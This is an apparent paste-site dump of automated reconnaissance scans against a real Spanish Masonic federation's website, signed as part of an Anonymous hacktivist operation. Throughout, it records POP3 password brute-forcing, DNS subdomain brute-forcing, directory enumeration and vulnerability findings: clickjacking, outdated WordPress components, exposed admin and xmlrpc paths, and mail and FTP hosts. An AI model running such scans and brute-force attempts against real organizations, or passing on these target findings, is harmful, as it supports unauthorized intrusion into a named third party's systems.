- Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Linux 3.2.0 (93%), Linux 2.6.18 - 2.6.22 (93%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 1 hop
- Host script results:
- | dns-blacklist:
- | SPAM
- |_ l2.apews.org - SPAM
- | dns-brute:
- | DNS Brute-force hostnames:
- | ns.elderechohumano.org - 51.255.33.229
- | mail.elderechohumano.org - 51.255.33.229
- | www.elderechohumano.org - 51.255.33.229
- | ftp.elderechohumano.org - 51.255.33.229
- |_ smtp.elderechohumano.org - 51.255.33.229
- TRACEROUTE (using port 53/tcp)
- HOP RTT ADDRESS
- 1 472.37 ms 229.ip-51-255-33.eu (51.255.33.229)
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 41.27 seconds
- + -- --=[Port 67 closed... skipping.
- + -- --=[Port 68 closed... skipping.
- + -- --=[Port 69 closed... skipping.
- + -- --=[Port 79 closed... skipping.
- + -- --=[Port 80 opened... running tests...
- #######################################################################################################################################
- http://elderechohumano.org [301 Moved Permanently] Country[UNITED KINGDOM][GB], HTTPServer[nginx], IP[51.255.33.229], RedirectLocation[https://elderechohumano.org/], Title[301 Moved Permanently], nginx
- https://elderechohumano.org/ [302 Found] Country[UNITED KINGDOM][GB], HTTPServer[nginx], IP[51.255.33.229], Plesk[Lin], RedirectLocation[https://elderechohumano.org/web], Title[302 Found], X-Powered-By[PleskLin], nginx
- https://elderechohumano.org/web [301 Moved Permanently] Country[UNITED KINGDOM][GB], HTTPServer[nginx], IP[51.255.33.229], Plesk[Lin], RedirectLocation[https://elderechohumano.org/web/], Title[301 Moved Permanently], X-Powered-By[PleskLin], nginx
- https://elderechohumano.org/web/ [200 OK] Country[UNITED KINGDOM][GB], HTML5, HTTPServer[nginx], IP[51.255.33.229], JQuery[1.12.4], MetaGenerator[WordPress 4.9.6], Open-Graph-Protocol[website], PHP[5.6.31,], Plesk[Lin], Script[text/javascript], Title[Federación española le droit humain el derecho humano – Logias españolas de la orden masónica mixta internacional], UncommonHeaders[link], WordPress[4.9.6], X-Powered-By[PHP/5.6.31, PleskLin], nginx, x-pingback[https://elderechohumano.org/web/xmlrpc.php]
- __ ______ _____
- \ \/ / ___|_ _|
- \ /\___ \ | |
- / \ ___) || |
- /_/\_|____/ |_|
- + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
- + -- --=[Target: elderechohumano.org:80
- + -- --=[Site not vulnerable to Cross-Site Tracing!
- + -- --=[Site not vulnerable to Host Header Injection!
- + -- --=[Site vulnerable to Cross-Frame Scripting!
- + -- --=[Site vulnerable to Clickjacking!
- HTTP/1.1 405 Not Allowed
- Server: nginx
- Date: Wed, 23 May 2018 06:25:33 GMT
- Content-Type: text/html
- Content-Length: 166
- Connection: close
- <html>
- <head><title>405 Not Allowed</title></head>
- <body bgcolor="white">
- <center><h1>405 Not Allowed</h1></center>
- <hr><center>nginx</center>
- </body>
- </html>
- HTTP/1.1 301 Moved Permanently
- Server: nginx
- Date: Wed, 23 May 2018 06:25:36 GMT
- Content-Type: text/html
- Content-Length: 178
- Connection: keep-alive
- Location: https://elderechohumano.org/
- <html>
- <head><title>301 Moved Permanently</title></head>
- <body bgcolor="white">
- <center><h1>301 Moved Permanently</h1></center>
- <hr><center>nginx</center>
- </body>
- </html>
- #######################################################################################################################################
- + -- --=[Checking if X-Content options are enabled on elderechohumano.org...
- + -- --=[Checking if X-Frame options are enabled on elderechohumano.org...
- + -- --=[Checking if X-XSS-Protection header is enabled on elderechohumano.org...
- + -- --=[Checking HTTP methods on elderechohumano.org...
- + -- --=[Checking if TRACE method is enabled on elderechohumano.org...
- + -- --=[Checking for META tags on elderechohumano.org...
- + -- --=[Checking for open proxy on elderechohumano.org...
- </div>
- <div id="footer-wrapper">
- <div id="footer">
- This page was generated by <a href="http://www.parallels.com/products/panel/intro">Parallels Plesk</a> <span class="separator"> </span> <a class="copyright" href="http://www.parallels.com">© 1999-2014. Parallels IP Holdings GmbH. All rights reserved.</a>
- </div>
- </div>
- </body>
- </html>
- + -- --=[Enumerating software on elderechohumano.org...
- Server: nginx
- + -- --=[Checking if Strict-Transport-Security is enabled on elderechohumano.org...
- + -- --=[Checking for Flash cross-domain policy on elderechohumano.org...
- <html>
- <head><title>301 Moved Permanently</title></head>
- <body bgcolor="white">
- <center><h1>301 Moved Permanently</h1></center>
- <hr><center>nginx</center>
- </body>
- </html>
- + -- --=[Checking for Silverlight cross-domain policy on elderechohumano.org...
- <html>
- <head><title>301 Moved Permanently</title></head>
- <body bgcolor="white">
- <center><h1>301 Moved Permanently</h1></center>
- <hr><center>nginx</center>
- </body>
- </html>
- + -- --=[Checking for HTML5 cross-origin resource sharing on elderechohumano.org...
- + -- --=[Retrieving robots.txt on elderechohumano.org...
- <html>
- <head><title>301 Moved Permanently</title></head>
- <body bgcolor="white">
- <center><h1>301 Moved Permanently</h1></center>
- <hr><center>nginx</center>
- </body>
- </html>
- + -- --=[Retrieving sitemap.xml on elderechohumano.org...
- <html>
- <head><title>301 Moved Permanently</title></head>
- <body bgcolor="white">
- <center><h1>301 Moved Permanently</h1></center>
- <hr><center>nginx</center>
- </body>
- </html>
- + -- --=[Checking cookie attributes on elderechohumano.org...
- + -- --=[Checking for ASP.NET Detailed Errors on elderechohumano.org...
- <BASE href="/error_docs/"><!--[if lte IE 6]></BASE><![endif]-->
- - an error's message is "too small", specifically
- - its own error message. You can turn that off,
- - "smart error messages". That means, of course,
- - that short error messages are censored by default.
- - IIS always returns error messages that are long
- - workaround is pretty simple: pad the error
- #######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- [ ! ] Starting SCANNER INURLBR 2.1 at [23-05-2018 02:27:00]
- [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
- It is the end user's responsibility to obey all applicable local, state and federal laws.
- Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-elderechohumano.org.txt ]
- [ INFO ][ DORK ]::[ site:elderechohumano.org ]
- [ INFO ][ SEARCHING ]:: {
- [ INFO ][ ENGINE ]::[ GOOGLE - www.google.co.ug ]
- [ INFO ][ SEARCHING ]::
- -[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE API ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.sa ID: 002901626849897788481:cpnctza84gq ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
- [ INFO ] Not a satisfactory result was found!
- [ INFO ] [ Shutting down ]
- [ INFO ] [ End of process INURLBR at [23-05-2018 02:27:20]
- [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
- [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-elderechohumano.org.txt ]
- |_________________________________________________________________________________________
- \_________________________________________________________________________________________/
- + -- --=[Port 110 opened... running tests...
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-23 02:27 EDT
- Nmap scan report for elderechohumano.org (51.255.33.229)
- Host is up (0.42s latency).
- rDNS record for 51.255.33.229: 229.ip-51-255-33.eu
- PORT STATE SERVICE VERSION
- 110/tcp open pop3 Courier pop3d
- | pop3-brute:
- | Accounts: No valid accounts found
- | Statistics: Performed 28 guesses in 17 seconds, average tps: 1.6
- |_ ERROR: Failed to connect.
- |_pop3-capabilities: PIPELINING TOP APOP UIDL SASL(LOGIN CRAM-MD5 CRAM-SHA1 CRAM-SHA256) IMPLEMENTATION(Courier Mail Server) STLS LOGIN-DELAY(10)
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: WAP|general purpose
- Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 3.X|2.6.X (93%)
- OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:3.2.0 cpe:/o:linux:linux_kernel:2.6
- Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Linux 3.2.0 (93%), Linux 2.6.18 - 2.6.22 (93%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 1 hop
- Service Info: Host: localhost.localdomain
- TRACEROUTE (using port 443/tcp)
- HOP RTT ADDRESS
- 1 480.50 ms 229.ip-51-255-33.eu (51.255.33.229)
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://elderechohumano.org
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 13
- #######################################################################################################################################
- __ ______ _____
- \ \/ / ___|_ _|
- \ /\___ \ | |
- / \ ___) || |
- /_/\_|____/ |_|
- + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
- + -- --=[Target: elderechohumano.org:443
- + -- --=[Site not vulnerable to Cross-Site Tracing!
- + -- --=[Site not vulnerable to Host Header Injection!
- + -- --=[Site vulnerable to Cross-Frame Scripting!
- + -- --=[Site vulnerable to Clickjacking!
- HTTP/1.1 405 Not Allowed
- Server: nginx
- Date: Wed, 23 May 2018 06:28:34 GMT
- Content-Type: text/html
- Content-Length: 166
- Connection: close
- <html>
- <head><title>405 Not Allowed</title></head>
- <body bgcolor="white">
- <center><h1>405 Not Allowed</h1></center>
- <hr><center>nginx</center>
- </body>
- </html>
- HTTP/1.1 400 Bad Request
- Server: nginx
- Date: Wed, 23 May 2018 06:28:37 GMT
- Content-Type: text/html
- Content-Length: 264
- Connection: close
- <html>
- <head><title>400 The plain HTTP request was sent to HTTPS port</title></head>
- <body bgcolor="white">
- <center><h1>400 Bad Request</h1></center>
- <center>The plain HTTP request was sent to HTTPS port</center>
- <hr><center>nginx</center>
- </body>
- </html>
- #######################################################################################################################################
- + -- --=[Checking if X-Content options are enabled on elderechohumano.org...
- + -- --=[Checking if X-Frame options are enabled on elderechohumano.org...
- + -- --=[Checking if X-XSS-Protection header is enabled on elderechohumano.org...
- + -- --=[Checking HTTP methods on elderechohumano.org...
- + -- --=[Checking if TRACE method is enabled on elderechohumano.org...
- + -- --=[Checking for META tags on elderechohumano.org...
- + -- --=[Checking for open proxy on elderechohumano.org...
- + -- --=[Enumerating software on elderechohumano.org...
- server: nginx
- x-powered-by: PleskLin
- + -- --=[Checking if Strict-Transport-Security is enabled on elderechohumano.org...
- + -- --=[Checking for Flash cross-domain policy on elderechohumano.org...
- - "smart error messages". That means, of course,
- - that short error messages are censored by default.
- - IIS always returns error messages that are long
- - enough to make Internet Explorer happy. The
- - workaround is pretty simple: pad the error
- - message with a big comment like this to push it
- - over the five hundred and twelve bytes minimum.
- - Of course, that's exactly what you're reading
- - right now.
- -->
- + -- --=[Checking for Silverlight cross-domain policy on elderechohumano.org...
- - "smart error messages". That means, of course,
- - that short error messages are censored by default.
- - IIS always returns error messages that are long
- - enough to make Internet Explorer happy. The
- - workaround is pretty simple: pad the error
- - message with a big comment like this to push it
- - over the five hundred and twelve bytes minimum.
- - Of course, that's exactly what you're reading
- - right now.
- -->
- + -- --=[Checking for HTML5 cross-origin resource sharing on elderechohumano.org...
- + -- --=[Retrieving robots.txt on elderechohumano.org...
- Disallow: /biblioteca/
- Disallow: /admin/
- Disallow: /mail/
- Disallow: /Maes/
- Disallow: /secretaria/
- Disallow: /venerables/
- Disallow: /gestion/
- Allow: /
- + -- --=[Retrieving sitemap.xml on elderechohumano.org...
- <url>
- <loc>http://www.elderechohumano.org/index.php?seccion=82&pagina=1</loc>
- </url>
- <url>
- <loc>http://www.elderechohumano.org/index.php?seccion=82&id=7&accion=detalleNoticia</loc>
- </url>
- <url>
- <loc>http://www.elderechohumano.org/index.php?seccion=82&id=4&accion=detalleNoticia</loc>
- </url>
- </urlset>
- + -- --=[Checking cookie attributes on elderechohumano.org...
- + -- --=[Checking for ASP.NET Detailed Errors on elderechohumano.org...
- <BASE href="/error_docs/"><!--[if lte IE 6]></BASE><![endif]-->
- - an error's message is "too small", specifically
- - its own error message. You can turn that off,
- - "smart error messages". That means, of course,
- - that short error messages are censored by default.
- - IIS always returns error messages that are long
- - workaround is pretty simple: pad the error
- <BASE href="/error_docs/"><!--[if lte IE 6]></BASE><![endif]-->
- - an error's message is "too small", specifically
- - its own error message. You can turn that off,
- - "smart error messages". That means, of course,
- - that short error messages are censored by default.
- - IIS always returns error messages that are long
- - workaround is pretty simple: pad the error
- #######################################################################################################################################
- AVAILABLE PLUGINS
- -----------------
- PluginCertInfo
- PluginSessionRenegotiation
- PluginHeartbleed
- PluginOpenSSLCipherSuites
- PluginCompression
- PluginSessionResumption
- PluginChromeSha1Deprecation
- PluginHSTS
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- elderechohumano.org:443 => 51.255.33.229:443
- SCAN RESULTS FOR ELDERECHOHUMANO.ORG:443 - 51.255.33.229:443
- ------------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: e5f63766c85b8e75a4db072309cb6b255a8034ff
- Common Name: elderechohumano.org
- Issuer: Let's Encrypt Authority X3
- Serial Number: 03919C2A49B013A9DB157AE36B4919656E40
- Not Before: Apr 23 15:58:13 2018 GMT
- Not After: Jul 22 15:58:13 2018 GMT
- Signature Algorithm: sha256WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- X509v3 Subject Alternative Name: {'DNS': ['elderechohumano.org', 'logiaferreriguardiadh.org.es', 'www.elderechohumano.org', 'www.logiaferreriguardiadh.org.es']}
- * Certificate - Trust:
- Hostname Validation: OK - Subject Alternative Name matches
- Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
- Java 6 CA Store (Update 65): OK - Certificate is trusted
- Microsoft CA Store (09/2015): OK - Certificate is trusted
- Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
- Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
- Certificate Chain Received: ['elderechohumano.org', "Let's Encrypt Authority X3"]
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * Session Resumption:
- With Session IDs: NOT SUPPORTED (0 successful, 5 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * SSLV3 Cipher Suites:
- Server rejected all cipher suites.
- SCAN COMPLETED IN 10.38 S
- -------------------------
- Version: 1.11.11-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 51.255.33.229
- Testing SSL server elderechohumano.org on port 443 using SNI name elderechohumano.org
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 256 bits CAMELLIA256-SHA
- Accepted TLSv1.2 128 bits CAMELLIA128-SHA
- Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 256 bits CAMELLIA256-SHA
- Accepted TLSv1.1 128 bits CAMELLIA128-SHA
- Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 256 bits CAMELLIA256-SHA
- Accepted TLSv1.0 128 bits CAMELLIA128-SHA
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: elderechohumano.org
- Altnames: DNS:elderechohumano.org, DNS:logiaferreriguardiadh.org.es, DNS:www.elderechohumano.org, DNS:www.logiaferreriguardiadh.org.es
- Issuer: Let's Encrypt Authority X3
- Not valid before: Apr 23 15:58:13 2018 GMT
- Not valid after: Jul 22 15:58:13 2018 GMT
- #######################################################################################################################################
- [*] Performing General Enumeration of Domain: elderechohumano.org
- [-] DNSSEC is not configured for elderechohumano.org
- [*] SOA sdns2.ovh.net 213.251.188.141
- [*] NS vps435959.ovh.net 51.255.33.229
- [*] Bind Version for 51.255.33.229 none
- [*] NS sdns2.ovh.net 213.251.188.141
- [*] Bind Version for 213.251.188.141 [Secured]
- [*] MX mail.elderechohumano.org 51.255.33.229
- [*] A elderechohumano.org 51.255.33.229
- [*] TXT elderechohumano.org v=spf1 +a +mx -all
- [*] TXT _domainkey.elderechohumano.org o=-
- [*] Enumerating SRV Records
- [-] No SRV Records Found for elderechohumano.org
- [+] 0 Records Found
- #######################################################################################################################################
- [*] Processing domain elderechohumano.org
- [+] Getting nameservers
- 213.251.188.141 - sdns2.ovh.net
- 51.255.33.229 - vps435959.ovh.net
- [-] Zone transfer failed
- [+] TXT records found
- "v=spf1 +a +mx -all"
- [+] MX records found, added to target list
- 10 mail.elderechohumano.org.
- [*] Scanning elderechohumano.org for A records
- 51.255.33.229 - elderechohumano.org
- 51.255.33.229 - ftp.elderechohumano.org
- 51.255.33.229 - imap.elderechohumano.org
- 51.255.33.229 - mail.elderechohumano.org
- 51.255.33.229 - ns.elderechohumano.org
- 51.255.33.229 - pop.elderechohumano.org
- 51.255.33.229 - pop3.elderechohumano.org
- 51.255.33.229 - smtp.elderechohumano.org
- 51.255.33.229 - webmail.elderechohumano.org
- 51.255.33.229 - www.elderechohumano.org
- #######################################################################################################################################
- Original* elderechohumano.org 51.255.33.229 NS:sdns2.ovh.net MX:mail.elderechohumano.org
- Subdomain elderecho.humano.org 88.214.194.86
- Subdomain elderechohu.mano.org 69.172.201.153 NS:ns1.uniregistrymarket.link
- Subdomain elderechohum.ano.org 210.249.74.117 NS:ns3.funcy.com MX:ms4.funcy.com
- Subdomain elderechohuman.o.org 50.63.46.1 NS:A.SERVICE.AFILIASDNS.INFO
- #######################################################################################################################################
- Ip Address Status Type Domain Name Server
- ---------- ------ ---- ----------- ------
- 51.255.33.229 200 alias ftp.elderechohumano.org nginx
- 51.255.33.229 200 host elderechohumano.org nginx
- 51.255.33.229 200 host imap.elderechohumano.org nginx
- 51.255.33.229 200 host mail.elderechohumano.org nginx
- 51.255.33.229 200 host ns.elderechohumano.org nginx
- 51.255.33.229 200 host pop.elderechohumano.org nginx
- 51.255.33.229 200 host pop3.elderechohumano.org nginx
- 51.255.33.229 200 host smtp.elderechohumano.org nginx
- 51.255.33.229 302 host webmail.elderechohumano.org nginx
- 51.255.33.229 301 alias www.elderechohumano.org nginx
- 51.255.33.229 301 host elderechohumano.org nginx
- #######################################################################################################################################
- [+] URL: https://elderechohumano.org/web/
- [+] Started: Wed May 23 03:09:38 2018
- [!] The WordPress 'https://elderechohumano.org/web/readme.html' file exists exposing a version number
- [+] Interesting header: LINK: <https://elderechohumano.org/web/wp-json/>; rel="https://api.w.org/", <https://wp.me/P4jvyk-a>; rel=shortlink
- [+] Interesting header: SERVER: nginx
- [+] Interesting header: X-POWERED-BY: PHP/5.6.31
- [+] Interesting header: X-POWERED-BY: PleskLin
- [+] XML-RPC Interface available under: https://elderechohumano.org/web/xmlrpc.php
- [+] WordPress version 4.9.6 (Released on 2018-05-17) identified from readme, links opml, stylesheets numbers, advanced fingerprinting, meta generator
- [+] WordPress theme in use: mantra - v2.6.1.1
- [+] Name: mantra - v2.6.1.1
- | Last updated: 2018-01-22T00:00:00.000Z
- | Location: https://elderechohumano.org/web/wp-content/themes/mantra/
- | Readme: https://elderechohumano.org/web/wp-content/themes/mantra/readme.txt
- [!] The version is out of date, the latest version is 3.0.4
- | Style URL: https://elderechohumano.org/web/wp-content/themes/mantra/style.css
- | Theme Name: Mantra
- | Theme URI: https://www.cryoutcreations.eu/wordpress-themes/mantra
- | Description: Mantra is a do-it-yourself WordPress theme, featuring a pack of over 100 customization options an...
- | Author: Cryout Creations
- | Author URI: https://www.cryoutcreations.eu
- [+] Enumerating plugins from passive detection ...
- | 1 plugin found:
- [+] Name: jetpack - v6.1
- | Last updated: 2018-05-22T21:44:00.000Z
- | Location: https://elderechohumano.org/web/wp-content/plugins/jetpack/
- | Readme: https://elderechohumano.org/web/wp-content/plugins/jetpack/readme.txt
- | Changelog: https://elderechohumano.org/web/wp-content/plugins/jetpack/changelog.txt
- [!] The version is out of date, the latest version is 6.1.1
- #######################################################################################################################################
- --------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 51.255.33.229
- + Target Hostname: elderechohumano.org
- + Target Port: 443
- ---------------------------------------------------------------------------------------------------------------------------------------
- + SSL Info: Subject: /CN=elderechohumano.org
- Ciphers: ECDHE-RSA-AES128-GCM-SHA256
- Issuer: /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
- + Start Time: 2018-05-23 03:13:23 (GMT-4)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: nginx
- + Retrieved x-powered-by header: PleskLin
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Root page / redirects to: https://elderechohumano.org/web
- + Server leaks inodes via ETags, header found with file /aOM2omfL.old, fields: 0x405 0x4e40c6af4a100
- + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: : Invalid argument
- + Scan terminated: 20 error(s) and 6 item(s) reported on remote host
- + End Time: 2018-05-23 03:33:49 (GMT-4) (1226 seconds)
- ---------------------------------------------------------------------------------------------------------------------------------------
- #######################################################################################################################################
- ======================================================================================================================================
- | [*] http://elderechohumano.org/ redirected to http://elderechohumano.org/web/
- | [*] New target is: http://elderechohumano.org/web/
- =======================================================================================================================================
- | Domain: http://elderechohumano.org/web/
- | Server: nginx
- | IP: 51.255.33.229
- =======================================================================================================================================
- |
- | Directory check:
- | [+] CODE: 200 URL: http://elderechohumano.org/web/ad/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/admin/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/ap/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/at/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/biblioteca/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/biblio/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/comunicado/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/conf/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/conferen/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/cont/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/conta/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/contact/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/de/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/di/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/embed/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/en/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/enlaces/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/entrevista/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/es/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/espanol/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/esp/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/feed/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/fe/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/historia/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/hist/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/home/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/in/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/inicio/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/int/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/intern/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/interna/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/laicismo/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/log/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/login/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/noticias/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/noticia/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/of/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/po/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/re/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/rss/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/visit/
- | [+] CODE: 200 URL: http://elderechohumano.org/web/wp-admin/
- =======================================================================================================================================
- |
- | File check:
- | [+] CODE: 200 URL: http://elderechohumano.org/web/admin/index.php
- | [+] CODE: 200 URL: http://elderechohumano.org/web/index.php
- | [+] CODE: 200 URL: http://elderechohumano.org/web/license.txt
- | [+] CODE: 200 URL: http://elderechohumano.org/web/readme.html
- | [+] CODE: 200 URL: http://elderechohumano.org/web/search/htx/sqlqhit.asp
- | [+] CODE: 200 URL: http://elderechohumano.org/web/search/htx/SQLQHit.asp
- | [+] CODE: 200 URL: http://elderechohumano.org/web/search/sqlqhit.asp
- | [+] CODE: 200 URL: http://elderechohumano.org/web/search/SQLQHit.asp
- =======================================================================================================================================
- |
- | Check robots.txt:
- |
- | Check sitemap.xml:
- =======================================================================================================================================
- |
- | Crawler Started:
- | Plugin name: phpinfo() Disclosure v.1 Loaded.
- | Plugin name: External Host Detect v.1.2 Loaded.
- | Plugin name: Code Disclosure v.1.1 Loaded.
- | Plugin name: Upload Form Detect v.1.1 Loaded.
- | Plugin name: FCKeditor upload test v.1 Loaded.
- | Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
- | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
- | Plugin name: E-mail Detection v.1.1 Loaded.
- | [+] Crawling finished, 34 URL's found!
- |
- | PHPinfo() Disclosure:
- |
- | External hosts:
- | [+] External Host Found: http://codex.wordpress.org
- | [+] External Host Found: http://planet.wordpress.org
- | [+] External Host Found: http://www.mysql.com
- | [+] External Host Found: https://droit-humain.org
- | [+] External Host Found: http://es.forums.wordpress.org
- | [+] External Host Found: https://fmd.es
- | [+] External Host Found: http://www.elolivoylaacacia.ml
- | [+] External Host Found: https://s0.wp.com
- | [+] External Host Found: http://auzolan.org.es
- | [+] External Host Found: https://wp.me
- | [+] External Host Found: https://wordpress.org
- | [+] External Host Found: http://php.net
- | [+] External Host Found: http://wordpress.org
- | [+] External Host Found: http://httpd.apache.org
- | [+] External Host Found: http://droit-humain.org
- | [+] External Host Found: https://gmpg.org
- | [+] External Host Found: https://auzolan.org.es
- | [+] External Host Found: https://secure.gravatar.com
- #######################################################################################################################################
- Anonymous #OPKilluminatie JTSEC Full Recon #3 2018
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement